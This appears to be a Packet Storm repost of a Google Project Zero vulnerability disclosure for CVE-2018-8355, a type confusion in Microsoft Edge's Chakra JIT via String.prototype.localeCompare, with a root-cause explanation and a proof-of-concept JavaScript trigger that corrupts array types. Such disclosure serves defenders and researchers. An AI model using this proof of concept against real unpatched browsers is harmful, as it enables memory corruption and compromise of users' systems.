Twenty Year Anniversary

Microsoft Edge Chakra JIT localeCompare Type Confusion

Microsoft Edge Chakra JIT localeCompare Type Confusion
Posted Sep 18, 2018
Authored by Google Security Research, lokihardt

Microsoft Edge Chakra JIT suffers from a type confusion vulnerability in localeCompare.

tags | exploit
advisories | CVE-2018-8355
MD5 | f4b3619f1626d973adb28bf93ce037e3

Microsoft Edge Chakra JIT localeCompare Type Confusion

Change Mirror Download
Microsoft Edge: Chakra: JIT: Type confusion with localeCompare 

CVE-2018-8355


A call to the String.prototype.localeCompare method can be inlineed when it only takes one argument. There are two versions of String.prototype.localeCompare, one [1] is written in JavaScript and the other [2] is written in C++ which just calls the JavaScript version when Intl enabled without updating ImplicitCallFlags. Since JavaScript code could be executed without touching ImplicitCallFlags, this could be exploited in a similar way to that I used for <a href="/p/project-zero/issues/detail?id=1565" title="Microsoft Edge: Chakra: JIT: ImplicitCallFlags check bypass with Intl" class="closed_ref" rel="nofollow"> issue 1565 </a>.

The only usable code I could find in the JavaScript localeCompare was:
const thatStr = String(that);

I could override the toString method of "that" which is the first parameter to execute arbitrary JavaScript code. But there was a problem that the toString method was also called in the C++ localeCompare prior to executing the JavaScript localeCompare which updated ImplicitCallFlags. Actually calling a JavaScript function can clear the flag during the initialization process [3] if profiling is enabled, but it was not for Intl.js. So I needed to find another way to exploit this.

Here's the JavaScript localeCompare.

let localeCompareStateCache;
platform.registerBuiltInFunction(tagPublicFunction("String.prototype.localeCompare", function (that, locales = undefined, options = undefined) {
if (this === undefined || this === null) {
platform.raiseThis_NullOrUndefined("String.prototype.localeCompare");
}

const thisStr = String(this);
const thatStr = String(that);

// Performance optimization to cache the state object and UCollator when the default arguments are provided
// TODO(jahorto): investigate caching when locales and/or options are provided
let stateObject;
if (locales === undefined && options === undefined) {
if (localeCompareStateCache === undefined) {
localeCompareStateCache = _.create();
InitializeCollator(localeCompareStateCache, undefined, undefined);
}

stateObject = localeCompareStateCache;
} else {
stateObject = _.create();
InitializeCollator(stateObject, locales, options);
}

return platform.localeCompare(thisStr, thatStr, stateObject, /* forStringPrototypeLocaleCompare */ true);
}), IntlBuiltInFunctionID.StringLocaleCompare);

My idea was to optimize the method partially, so that when it hits an unprofiled instruction, the flag gets cleared during the bailout process [4].

[1] <a href="https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/InJavascript/Intl.js#L984" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/InJavascript/Intl.js#L984</a>
[2] <a href="https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/JavascriptString.cpp#L1297" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Library/JavascriptString.cpp#L1297</a>
[3] <a href="https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Language/InterpreterStackFrame.cpp#L1831" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Runtime/Language/InterpreterStackFrame.cpp#L1831</a>
[4] <a href="https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Backend/BailOut.cpp#L1492" title="" class="" rel="nofollow">https://github.com/Microsoft/ChakraCore/blob/40f36e301848f105291bc669f6bb13016585b0c0/lib/Backend/BailOut.cpp#L1492</a>


PoC:
function opt(arr, s) {
arr[0] = 1.1;

if (s !== null) {
let tmp = 'a'.localeCompare(s);
}

arr[0] = 2.3023e-320;
}

function main() {
let arr = [1.1];

for (let i = 0; i < 100; i++) {
'a'.localeCompare('x', []); // Optimize the JavaScript localeCompare

opt(arr, null); // for profiling all instructions in opt.

try {
opt(arr, {toString: () => {
throw 1; // Don't profile "if (locales === undefined && options === undefined) {"
}});
} catch (e) {

}
}

opt(arr, {toString: () => {
// Called twice
arr[0] = {};
}});

print(arr);
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: lokihardt

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close